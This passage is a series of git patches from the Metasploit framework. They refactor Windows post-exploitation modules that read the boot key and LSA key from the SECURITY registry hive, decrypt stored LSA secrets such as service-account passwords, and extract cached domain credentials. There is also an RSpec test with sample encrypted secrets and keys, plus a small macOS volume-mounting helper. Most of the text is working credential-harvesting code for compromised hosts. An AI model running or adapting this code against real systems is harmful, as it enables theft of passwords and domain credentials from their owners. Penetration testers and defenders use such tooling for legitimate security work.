   end
 
-  def connect()
-    share_name = datastore['SHARE'].shellescape
-    protocol = datastore['PROTOCOL'].shellescape
+  def get_mounted_list
+    vprint_status("ls /Volumes")
+    data = cmd_exec("ls /Volumes")
+    list = []
+    lines = data.lines
+    lines.each do |line|
+      line.strip!
+      list << line
+    end
+    return list.sort
+  end
+
+  def mount
+    share_name = datastore['VOLUME']
+    protocol = datastore['PROTOCOL']
     print_status("Connecting to #{protocol}://#{share_name}")
     cmd = "osascript -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'"
     vprint_status(cmd)
     cmd_exec(cmd)
   end
+
+  def unmount
+    share_name = datastore['VOLUME']
+    print_status("Disconnecting from #{share_name}")
+    cmd = "osascript -e 'tell app \"finder\" to eject \"#{share_name}\"'"
+    vprint_status(cmd)
+    cmd_exec(cmd)
+  end
 end

From 3168359a8280e09ce6dfdd7a3fe52b40b3b542a0 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 11:55:39 -0600
Subject: [PATCH 022/217] Refactor lsa and add a spec for its crypto methods

---
 lib/msf/core/post/windows/priv.rb             |  47 ++++---
 .../post/windows/gather/credentials/lsa.rb    | 115 +++++++++---------
 spec/lib/msf/core/post/windows/priv_spec.rb   |  69 +++++++++++
 3 files changed, 151 insertions(+), 80 deletions(-)
 create mode 100644 spec/lib/msf/core/post/windows/priv_spec.rb

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 831120b5f0..c19045076f 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -92,7 +92,11 @@ module Msf::Post::Windows::Priv
     basekey = "System\\CurrentControlSet\\Control\\Lsa"
 
     %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+      begin
+        ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+      rescue Rex::Post::Meterpreter::RequestError
+      end
+
       return nil if not ok
       bootkey << [ok.query_class.to_i(16)].pack("V")
       ok.close
@@ -155,26 +159,24 @@ module Msf::Post::Windows::Priv
   # Returns the LSA key upon input of the unscrambled bootkey
   #
   def capture_lsa_key(bootkey)
-    begin
-      vprint_status("Getting PolSecretEncryptionKey...")
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
-      pol = ok.query_value("").data
-      vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
-      ok.close
+    vprint_status("Getting PolSecretEncryptionKey...")
+    pol = registry_getvaldata("HKLM\\SECURITY\\Policy\\PolSecretEncryptionKey", "")
+    if pol
       print_status("XP or below client")
       @vista = 0
-    rescue
+    else
       vprint_status("Trying 'V72' style...")
       vprint_status("Getting PolEKList...")
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
-      pol = ok.query_value("").data
-      vprint_good("Pol: #{pol.unpack("H*")[0]}")
-      ok.close
+      pol = registry_getvaldata("HKLM\\SECURITY\\Policy\\PolEKList", "")
       print_status("Vista or above client")
       @vista = 1
     end
+    # If that didn't work, then we're out of luck
+    return nil if pol.nil?
 
-    if( @vista == 1 )
+    vprint_good("Pol: #{pol.unpack("H*")[0]}")
+
+    if @vista == 1
       lsakey = decrypt_lsa_data(pol, bootkey)
       lsakey = lsakey[68,32]
       vprint_good(lsakey.unpack("H*")[0])
@@ -194,13 +196,15 @@ module Msf::Post::Windows::Priv
     return lsakey
   end
 
-  #
   # Decrypts the LSA encrypted data
   #
-  def decrypt_lsa_data(pol, encryptedkey)
+  # @param pol [String] The policy key stored in the registry
+  # @param encrypted_key [String]
+  # @return [String] The decrypted data
+  def decrypt_lsa_data(pol, encrypted_key)
 
     sha256x = Digest::SHA256.new()
-    sha256x << encryptedkey
+    sha256x << encrypted_key
     (1..1000).each do
       sha256x << pol[28,32]
     end
@@ -216,17 +220,20 @@ module Msf::Post::Windows::Priv
       aes.decrypt
       aes.padding = 0
       xx = aes.update(pol[i...i+16])
-      decrypted_data += xx
+      decrypted_data << xx
     end
-    vprint_good("Dec_Key #{decrypted_data}")
 
     return decrypted_data
   end
 
   # Decrypts "Secret" encrypted data
-  # Ruby implementation of SystemFunction005
-  # the original python code has been taken from Credump
   #
+  # Ruby implementation of SystemFunction005. The original python code
+  # has been taken from Credump
+  #
+  # @param secret [String]
+  # @param key [String]
+  # @return [String] The decrypted data
   def decrypt_secret_data(secret, key)
 
     j = 0
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 5466a72af9..2042730817 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -30,79 +30,70 @@ class Metasploit3 < Msf::Post
     ))
   end
 
-  def reg_getvaldata(key,valname)
-    v = nil
-    begin
-      root_key, base_key = client.sys.registry.splitkey(key)
-      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
-      vprint_status("reading key: #{key}#{valname}\n")
-      v = open_key.query_value(valname).data
-      open_key.close
-    rescue
-      print_error("Error opening key!")
-    end
-    return v
-  end
 
+  # Decrypted LSA key is passed into this function
+  def get_secret(lsa_key)
+    output = "\n"
 
-  #Decrypted LSA key is passed into this function
-  def get_secret(lkey)
-    sec_str = "\n"
+    # LSA Secret key location within the registry
+    root_regkey = "HKLM\\Security\\Policy\\Secrets\\"
+    services_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
 
-    #LSA Secret key location within the register
-    root_key = "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\"
+    secrets = registry_enumkeys(root_regkey)
 
-    key_arr = meterpreter_registry_enumkeys(root_key)
+    secrets.each do |secret_regkey|
+      sk_arr = registry_enumkeys(root_regkey + "\\" +  secret_regkey)
+      next unless sk_arr
 
-    key_arr.each do |keys|
-      mid_key = root_key + "\\" +  keys
-      sk_arr = meterpreter_registry_enumkeys(mid_key)
       sk_arr.each do |mkeys|
-        #CurrVal stores the currently set value of the key, in the case of
-        #services it usually come out as plan text
-        if(mkeys == "CurrVal")
-          val_key = root_key + "\\" + keys + "\\" + mkeys
-          v_name = ""
-          sec = reg_getvaldata(val_key, v_name)
-          if( @vista == 1 )
-            #Magic happens here
-            sec = sec[0..-1]
-            sec = decrypt_lsa_data(sec, lkey)[1..-1].scan(/[[:print:]]/).join
-          else
-            #and here
-            sec = sec[0xC..-1]
-            sec = decrypt_secret_data(sec, lkey).scan(/[[:print:]]/).join
-          end
+        # CurrVal stores the currently set value of the key. In the case
+        # of services, this is usually the password for the service
+        # account.
+        next unless mkeys == "CurrVal"
 
-          if(sec.length > 0)
-            if(keys[0,4] == "_SC_")
-              user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
-              keys_c = keys[4,keys.length]
-              user_key = user_key << keys_c
-              n_val = "ObjectName"
-              user_n = reg_getvaldata(user_key, n_val)
+        val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
+        encrypted_secret = registry_getvaldata(val_key, "")
 
-              #if the unencrypted value is not blank and is a service, print
-              print_good("Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n")
-              sec_str = sec_str << "Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n"
-            else
-              #if the unencrypted value is not blank, print
-              print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
-              sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
-            end
-          else
-            next
-          end
+        if @vista == 1
+          # Magic happens here
+          decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
+        else
+          # and here
+          encrypted_secret = encrypted_secret[0xC..-1]
+          decrypted = decrypt_secret_data(encrypted_secret, lsa_key)
+        end
+
+        next unless decrypted.length > 0
+
+        # axe all the non-printables
+        decrypted = decrypted.scan(/[[:print:]]/).join
+
+        if secret_regkey.start_with?("_SC_")
+          # Service secrets are named like "_SC_yourmom" for a service
+          # with name "yourmom". Strip off the "_SC_" to get something
+          # we can lookup in the list of services to find out what
+          # account this secret is associated with.
+          svc_name = secret_regkey[4,secret_regkey.length]
+          svc_user = registry_getvaldata(services_key + svc_name, "ObjectName")
+
+          # if the unencrypted value is not blank and is a service, print
+          print_good("Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n")
+          output  << "Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n"
+        else
+          # if the unencrypted value is not blank, print
+          print_good("Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n")
+          output  << "Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n"
         end
       end
     end
-    return sec_str
+
+    return output
   end
 
   # The sauce starts here
   def run
 
-    hostname = session.sys.config.sysinfo['Computer']
+    hostname = sysinfo['Computer']
     print_status("Executing module against #{hostname}")
 
     print_status('Obtaining boot key...')
@@ -110,10 +101,14 @@ class Metasploit3 < Msf::Post
     vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
 
     print_status('Obtaining Lsa key...')
-    lsakey = capture_lsa_key(bootkey)
-    vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
+    lsa_key = capture_lsa_key(bootkey)
+    if lsa_key.nil?
+      print_error("Could not retrieve LSA key. Are you SYSTEM?")
+      return
+    end
+    vprint_status("Lsa Key: #{lsa_key.unpack("H*")[0]}")
 
-    secrets = hostname << get_secret(lsakey)
+    secrets = hostname + get_secret(lsa_key)
 
     print_status("Writing to loot...")
 
diff --git a/spec/lib/msf/core/post/windows/priv_spec.rb b/spec/lib/msf/core/post/windows/priv_spec.rb
new file mode 100644
index 0000000000..9cfb6ebc9f
--- /dev/null
+++ b/spec/lib/msf/core/post/windows/priv_spec.rb
@@ -0,0 +1,69 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+
+require 'msf/core/post/windows/priv'
+
+describe Msf::Post::Windows::Priv do
+
+  subject do
+    mod = Module.new
+    mod.extend described_class
+    mod.stub :vprint_status
+    mod.stub :print_status
+    mod
+  end
+
+  # For Vista and newer
+  describe "#decrypt_lsa_data" do
+    let(:ciphertext) do
+      # From "HKLM\\Security\\Policy\\Secrets\\"
+      "\x00\x00\x00\x01\x68\x6e\x97\x93\xdb\xdb\xde\xc8\xf7\x40\x08\x79"+
+      "\x9d\x91\x64\x1c\x03\x00\x00\x00\x00\x00\x00\x00\x68\x38\x3f\xc5"+
+      "\x94\x10\xac\xcf\xbe\xf7\x8d\x12\xc0\xd5\xa2\x9d\x3d\x30\x30\xa8"+
+      "\x6d\xbd\xc6\x48\xd3\xe4\x36\x33\x86\x91\x0d\x8d\x8f\xfc\xd4\x8a"+
+      "\x87\x0c\x83\xde\xb4\x73\x9e\x21\x1b\x39\xef\x04\x36\x67\x97\x8a"+
+      "\x43\x40\x79\xcf\xdb\x3d\xcc\xfe\x10\x0c\x78\x11\x00\x00\x00\x00"+
+      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    end
+    let(:lsa_key) do
+      "\x93\x19\xb7\xb3\x93\x5b\xcb\x53\x5c\xb0\x54\xce\x0f\x5e\x27\xfd"+
+      "\x4f\xd1\xe3\xd3\x5b\x8c\x90\x4c\x13\xda\xb8\x39\xcc\x4e\x28\x43"
+    end
+    let(:plaintext) do
+      # Length of actual data?
+      "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+      # Unicode msfadmin
+      "\x6d\x00\x73\x00\x66\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00"+
+      # As far as I can tell, the rest of the data is gibberish?
+      # Possibly random padding, since plaintext seems to always be a
+      # multiple of 16 bytes.
+      "\xc3\x5f\x85\xc2\x62\x55\x25\x6c\x42\x89\x88\xc1\xe0\xe8\x17\x5e"
+    end
+
+    it "should produce expected plaintext" do
+      decrypted = subject.decrypt_lsa_data(ciphertext, lsa_key)
+      decrypted.should == plaintext
+    end
+  end
+
+  # For XP and older
+  describe "#decrypt_secret_data" do
+    let(:ciphertext) do
+      # From "HKLM\\Security\\Policy\\Secrets\\"
+      "\x22\xea\xc4\xd8\xfc\x5d\x36\xf4\x2e\x8b\xd3\x0f\x5d\xbc\xc4\x3a" +
+      "\x37\x4b\x84\xea\xa0\xc0\x96\x61"
+    end
+    let(:boot_key) do
+      "\x27\x18\x0a\x2e\xe0\xfb\x98\x52\x77\x06\x24\x8e\x21\x80\xf4\x56"
+    end
+    let(:plaintext) do
+      # Unicode "msfadmin"
+      "\x6d\x00\x73\x00\x66\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00"
+    end
+
+    it "should produce expected plaintext" do
+      subject.decrypt_secret_data(ciphertext, boot_key).should == plaintext
+    end
+  end
+
+end

From 16627c1bd30df36c184864f10f974392a11c41c8 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 15:16:34 -0600
Subject: [PATCH 023/217] Add spec for capture_lsa_key

---
 lib/msf/core/post/windows/priv.rb             | 40 ++++++-------
 .../post/windows/gather/credentials/lsa.rb    |  2 +-
 spec/lib/msf/core/post/windows/priv_spec.rb   | 60 +++++++++++++++++--
 3 files changed, 75 insertions(+), 27 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index c19045076f..6bd10bad65 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -164,23 +164,6 @@ module Msf::Post::Windows::Priv
     if pol
       print_status("XP or below client")
       @vista = 0
-    else
-      vprint_status("Trying 'V72' style...")
-      vprint_status("Getting PolEKList...")
-      pol = registry_getvaldata("HKLM\\SECURITY\\Policy\\PolEKList", "")
-      print_status("Vista or above client")
-      @vista = 1
-    end
-    # If that didn't work, then we're out of luck
-    return nil if pol.nil?
-
-    vprint_good("Pol: #{pol.unpack("H*")[0]}")
-
-    if @vista == 1
-      lsakey = decrypt_lsa_data(pol, bootkey)
-      lsakey = lsakey[68,32]
-      vprint_good(lsakey.unpack("H*")[0])
-    else
       md5x = Digest::MD5.new()
       md5x << bootkey
       (1..1000).each do
@@ -189,11 +172,26 @@ module Msf::Post::Windows::Priv
 
       rc4 = OpenSSL::Cipher::Cipher.new("rc4")
       rc4.key = md5x.digest
-      lsakey  = rc4.update(pol[12,48])
-      lsakey << rc4.final
-      lsakey = lsakey[0x10..0x1F]
+      lsa_key  = rc4.update(pol[12,48])
+      lsa_key << rc4.final
+      lsa_key = lsa_key[0x10..0x1F]
+    else
+      print_status("Vista or above client")
+      @vista = 1
+
+      vprint_status("Trying 'V72' style...")
+      vprint_status("Getting PolEKList...")
+      pol = registry_getvaldata("HKLM\\SECURITY\\Policy\\PolEKList", "")
+
+      # If that didn't work, then we're out of luck
+      return nil if pol.nil?
+
+      lsa_key = decrypt_lsa_data(pol, bootkey)
+      lsa_key = lsa_key[68,32]
     end
-    return lsakey
+
+    vprint_good(lsa_key.unpack("H*")[0])
+    return lsa_key
   end
 
   # Decrypts the LSA encrypted data
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 2042730817..b512b63abb 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Post
   end
 
 
-  # Decrypted LSA key is passed into this function
+  # Decrypted LSA key is passed into this method
   def get_secret(lsa_key)
     output = "\n"
 
diff --git a/spec/lib/msf/core/post/windows/priv_spec.rb b/spec/lib/msf/core/post/windows/priv_spec.rb
index 9cfb6ebc9f..e30971ff10 100644
--- a/spec/lib/msf/core/post/windows/priv_spec.rb
+++ b/spec/lib/msf/core/post/windows/priv_spec.rb
@@ -8,11 +8,18 @@ describe Msf::Post::Windows::Priv do
   subject do
     mod = Module.new
     mod.extend described_class
-    mod.stub :vprint_status
-    mod.stub :print_status
+    stubs = [ :vprint_status, :print_status, :vprint_good, :print_good, ]
+    stubs.each { |meth| mod.stub(meth) }
     mod
   end
 
+  let(:boot_key_vista) do
+    "\x50\xfb\xae\x5f\x5c\xd7\x70\x39\x54\xe5\x50\x48\x32\x1b\x81\x8d"
+  end
+  let(:boot_key_xp) do
+    "\x27\x18\x0a\x2e\xe0\xfb\x98\x52\x77\x06\x24\x8e\x21\x80\xf4\x56"
+  end
+
   # For Vista and newer
   describe "#decrypt_lsa_data" do
     let(:ciphertext) do
@@ -53,9 +60,7 @@ describe Msf::Post::Windows::Priv do
       "\x22\xea\xc4\xd8\xfc\x5d\x36\xf4\x2e\x8b\xd3\x0f\x5d\xbc\xc4\x3a" +
       "\x37\x4b\x84\xea\xa0\xc0\x96\x61"
     end
-    let(:boot_key) do
-      "\x27\x18\x0a\x2e\xe0\xfb\x98\x52\x77\x06\x24\x8e\x21\x80\xf4\x56"
-    end
+    let(:boot_key) { boot_key_xp }
     let(:plaintext) do
       # Unicode "msfadmin"
       "\x6d\x00\x73\x00\x66\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00"
@@ -66,4 +71,49 @@ describe Msf::Post::Windows::Priv do
     end
   end
 
+
+  describe "#capture_lsa_key" do
+    let(:pol_enc_key_vista) do
+      "\x00\x00\x00\x01\xec\xff\xe1\x7b\x2a\x99\x74\x40\xaa\x93\x9a\xdb"+
+      "\xff\x26\xf1\xfc\x03\x00\x00\x00\x00\x00\x00\x00\x67\xe0\x47\xa1"+
+      "\xb9\xea\x6c\xa4\x1b\xf7\x95\x75\x69\xdf\x87\x6b\x66\x99\x99\x56"+
+      "\x1f\xe4\x0a\xbd\xf3\x08\xd1\x72\x62\x54\xb7\xe8\xfb\x13\x15\x69"+
+      "\x88\xe0\x71\xbd\xd0\xab\x54\x66\x4c\x7c\x33\xb7\xfc\x16\x23\xa5"+
+      "\x94\xd2\xe3\x5d\xbe\x1a\x6c\x2f\xaf\xb0\xfa\x16\x02\x69\x3e\x05"+
+      "\xce\x3e\xf2\x9f\xa5\xd8\xb9\x18\x6e\x8a\x03\x7e\x8f\x2f\x56\x5d"+
+      "\xf4\x65\xee\xc9\x84\x52\x48\x9f\x5a\x6f\xb8\x17\x78\x28\x09\x40"+
+      "\xc1\x7c\xdf\x46\x65\x7d\x94\xe5\x79\x17\xb9\x40\x7a\xc7\x35\x3a"+
+      "\x7d\x39\x9f\x65\x91\x7f\x26\x51\xaf\x57\x03\x2f\x81\xe5\xcd\x5f"+
+      "\xfc\x21\xe3\xf5\xd1\xd6\xed\xd1\x60\x6e\xc9\x15"
+    end
+    let(:pol_enc_key_xp) do
+      "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x26\x07\x4d\x67"+
+      "\x85\x3f\x55\x36\x6f\x89\x8d\x6f\x9f\x78\x20\xbd\xc9\xed\x66\x96"+
+      "\x28\x49\x1f\x45\x65\x7c\xb9\xe1\x65\x2d\xec\x8d\x54\xe9\xdf\x27"+
+      "\xc4\xfd\x38\xf4\x8d\x5d\xc0\xcb\xa3\x8d\xef\xcb\xeb\x46\x32\x23"+
+      "\xb8\x86\x95\x2c\x79\xee\x6f\x89\x61\x8b\x89\x14"
+    end
+
+    context "with an XP or older registry" do
+      let(:pol_enc_key) { pol_enc_key_xp }
+      let(:boot_key) { boot_key_xp }
+
+      it "should produce expected LSA key" do
+        subject.stub(:registry_getvaldata).with("HKLM\\SECURITY\\Policy\\PolSecretEncryptionKey", "").and_return(pol_enc_key_xp)
+        subject.stub(:registry_getvaldata).with("HKLM\\SECURITY\\Policy\\PolEKList", "").and_return(nil)
+        subject.capture_lsa_key(boot_key_xp)
+      end
+    end
+
+    context "with a Vista or newer registry" do
+      let(:pol_enc_key) { pol_enc_key_vista }
+      let(:boot_key) { boot_key_vista }
+
+      it "should produce expected LSA key" do
+        subject.stub(:registry_getvaldata).with("HKLM\\SECURITY\\Policy\\PolSecretEncryptionKey", "").and_return(nil)
+        subject.stub(:registry_getvaldata).with("HKLM\\SECURITY\\Policy\\PolEKList", "").and_return(pol_enc_key_vista)
+        subject.capture_lsa_key(boot_key)
+      end
+    end
+  end
 end

From 8bb72764ec495c9a00b0f02027fbdfe9450a5436 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 15:23:15 -0600
Subject: [PATCH 024/217] Rename credentials/lsa -> lsa_secrets

Secrets are not necessarily credentials
---
 .../post/windows/gather/{credentials/lsa.rb => lsa_secrets.rb}    | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/post/windows/gather/{credentials/lsa.rb => lsa_secrets.rb} (100%)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/lsa_secrets.rb
similarity index 100%
rename from modules/post/windows/gather/credentials/lsa.rb
rename to modules/post/windows/gather/lsa_secrets.rb

From 8471f74b75634b7986fdd791cbfa6fa5ae92f138 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 18:08:02 -0600
Subject: [PATCH 025/217] Refactor ivar to a more reasonable method

Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
---
 lib/msf/core/post/windows/priv.rb          |  42 ++++++---
 modules/post/windows/gather/cachedump.rb   | 100 ++++++++++-----------
 modules/post/windows/gather/lsa_secrets.rb |   2 +-
 3 files changed, 78 insertions(+), 66 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 6bd10bad65..0914e75aed 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -158,12 +158,14 @@ module Msf::Post::Windows::Priv
   #
   # Returns the LSA key upon input of the unscrambled bootkey
   #
+  # @note This requires the session be running as SYSTEM
+  #
   def capture_lsa_key(bootkey)
     vprint_status("Getting PolSecretEncryptionKey...")
     pol = registry_getvaldata("HKLM\\SECURITY\\Policy\\PolSecretEncryptionKey", "")
     if pol
-      print_status("XP or below client")
-      @vista = 0
+      print_status("XP or below system")
+      @lsa_vista_style = false
       md5x = Digest::MD5.new()
       md5x << bootkey
       (1..1000).each do
@@ -176,8 +178,8 @@ module Msf::Post::Windows::Priv
       lsa_key << rc4.final
       lsa_key = lsa_key[0x10..0x1F]
     else
-      print_status("Vista or above client")
-      @vista = 1
+      print_status("Vista or above system")
+      @lsa_vista_style = true
 
       vprint_status("Trying 'V72' style...")
       vprint_status("Getting PolEKList...")
@@ -194,17 +196,30 @@ module Msf::Post::Windows::Priv
     return lsa_key
   end
 
-  # Decrypts the LSA encrypted data
+  # Whether this system has Vista-style secret keys
   #
-  # @param pol [String] The policy key stored in the registry
-  # @param encrypted_key [String]
+  # @return [Boolean] True if this session has keys in the PolEKList
+  #   registry key, false otherwise.
+  def lsa_vista_style?
+    if @lsa_vista_style.nil?
+      @lsa_vista_style = !!(registry_getvaldata("HKLM\\SECURITY\\Policy\\PolEKList", ""))
+    end
+
+    @lsa_vista_style
+  end
+
+  # Decrypts LSA encrypted data
+  #
+  # @param policy_secret [String] The encrypted data stored in the
+  #   registry.
+  # @param lsa_key [String] The key as returned by {#capture_lsa_key}
   # @return [String] The decrypted data
-  def decrypt_lsa_data(pol, encrypted_key)
+  def decrypt_lsa_data(policy_secret, lsa_key)
 
     sha256x = Digest::SHA256.new()
-    sha256x << encrypted_key
-    (1..1000).each do
-      sha256x << pol[28,32]
+    sha256x << lsa_key
+    1000.times do
+      sha256x << policy_secret[28,32]
     end
 
     aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
@@ -214,11 +229,10 @@ module Msf::Post::Windows::Priv
 
     decrypted_data = ''
 
-    for i in (60...pol.length).step(16)
+    (60...policy_secret.length).step(16) do |i|
       aes.decrypt
       aes.padding = 0
-      xx = aes.update(pol[i...i+16])
-      decrypted_data << xx
+      decrypted_data << aes.update(policy_secret[i,16])
     end
 
     return decrypted_data
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index f53159a6cc..60dd9b3bef 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -41,29 +41,19 @@ class Metasploit3 < Msf::Post
 
 
   def check_gpo
-    begin
-      winlogonkey = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", KEY_READ)
-      gposetting = winlogonkey.query_value('CachedLogonsCount').data
-      print_status("Cached Credentials Setting: #{gposetting.to_s} - (Max is 50 and 0 disables, and 10 is default)")
-      #ValueName: CachedLogonsCount
-      #Data Type: REG_SZ
-      #Values: 0 - 50
-    rescue ::Exception => e
-      print_error("Cache setting not found...")
-    end
+    gposetting = registry_getvaldata("HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "CachedLogonsCount")
+    print_status("Cached Credentials Setting: #{gposetting} - (Max is 50 and 0 disables, and 10 is default)")
   end
 
   def capture_nlkm(lsakey)
-    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
-    nlkm = ok.query_value("").data
-    ok.close
+    nlkm = registry_getvaldata("HKLM\\SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", "")
 
     print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
 
-    if( @vista == 1 )
-      nlkm_dec = decrypt_lsa_data( nlkm[0..-1], lsakey)
+    if lsa_vista_style?
+      nlkm_dec = decrypt_lsa_data(nlkm, lsakey)
     else
-      nlkm_dec = decrypt_secret_data( nlkm[0xC..-1], lsakey)
+      nlkm_dec = decrypt_secret_data(nlkm[0xC..-1], lsakey)
     end
 
     return nlkm_dec
@@ -72,10 +62,10 @@ class Metasploit3 < Msf::Post
   def parse_decrypted_cache(dec_data, s)
 
     i = 0
-    hash = dec_data[i...i+0x10]
-    i+=72
+    hash = dec_data[i,0x10]
+    i += 72
 
-    username = dec_data[i...i+(s.userNameLength)].split("\x00\x00").first.gsub("\x00", '')
+    username = dec_data[i,s.userNameLength].split("\x00\x00").first.gsub("\x00", '')
     i+=s.userNameLength
     i+=2 * ( ( s.userNameLength / 2 ) % 2 )
 
@@ -85,60 +75,60 @@ class Metasploit3 < Msf::Post
     last = Time.at(s.lastAccess)
     vprint_good "Last login\t\t: #{last.strftime("%F %T")} "
 
-    domain = dec_data[i...i+s.domainNameLength+1]
+    domain = dec_data[i,s.domainNameLength+1]
     i+=s.domainNameLength
 
     if( s.dnsDomainNameLength != 0)
-      dnsDomainName = dec_data[i...i+s.dnsDomainNameLength+1].split("\x00\x00").first.gsub("\x00", '')
+      dnsDomainName = dec_data[i,s.dnsDomainNameLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.dnsDomainNameLength
       i+=2 * ( ( s.dnsDomainNameLength / 2 ) % 2 )
       vprint_good "DNS Domain Name\t: #{dnsDomainName}"
     end
 
     if( s.upnLength != 0)
-      upn = dec_data[i...i+s.upnLength+1].split("\x00\x00").first.gsub("\x00", '')
+      upn = dec_data[i,s.upnLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.upnLength
       i+=2 * ( ( s.upnLength / 2 ) % 2 )
       vprint_good "UPN\t\t\t: #{upn}"
     end
 
     if( s.effectiveNameLength != 0 )
-      effectiveName = dec_data[i...i+s.effectiveNameLength+1].split("\x00\x00").first.gsub("\x00", '')
+      effectiveName = dec_data[i,s.effectiveNameLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.effectiveNameLength
       i+=2 * ( ( s.effectiveNameLength / 2 ) % 2 )
       vprint_good "Effective Name\t: #{effectiveName}"
     end
 
     if( s.fullNameLength != 0 )
-      fullName = dec_data[i...i+s.fullNameLength+1].split("\x00\x00").first.gsub("\x00", '')
+      fullName = dec_data[i,s.fullNameLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.fullNameLength
       i+=2 * ( ( s.fullNameLength / 2 ) % 2 )
       vprint_good "Full Name\t\t: #{fullName}"
     end
 
     if( s.logonScriptLength != 0 )
-      logonScript = dec_data[i...i+s.logonScriptLength+1].split("\x00\x00").first.gsub("\x00", '')
+      logonScript = dec_data[i,s.logonScriptLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.logonScriptLength
       i+=2 * ( ( s.logonScriptLength / 2 ) % 2 )
       vprint_good "Logon Script\t\t: #{logonScript}"
     end
 
     if( s.profilePathLength != 0 )
-      profilePath = dec_data[i...i+s.profilePathLength+1].split("\x00\x00").first.gsub("\x00", '')
+      profilePath = dec_data[i,s.profilePathLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.profilePathLength
       i+=2 * ( ( s.profilePathLength / 2 ) % 2 )
       vprint_good "Profile Path\t\t: #{profilePath}"
     end
 
     if( s.homeDirectoryLength != 0 )
-      homeDirectory = dec_data[i...i+s.homeDirectoryLength+1].split("\x00\x00").first.gsub("\x00", '')
+      homeDirectory = dec_data[i,s.homeDirectoryLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.homeDirectoryLength
       i+=2 * ( ( s.homeDirectoryLength / 2 ) % 2 )
       vprint_good "Home Directory\t\t: #{homeDirectory}"
     end
 
     if( s.homeDirectoryDriveLength != 0 )
-      homeDirectoryDrive = dec_data[i...i+s.homeDirectoryDriveLength+1].split("\x00\x00").first.gsub("\x00", '')
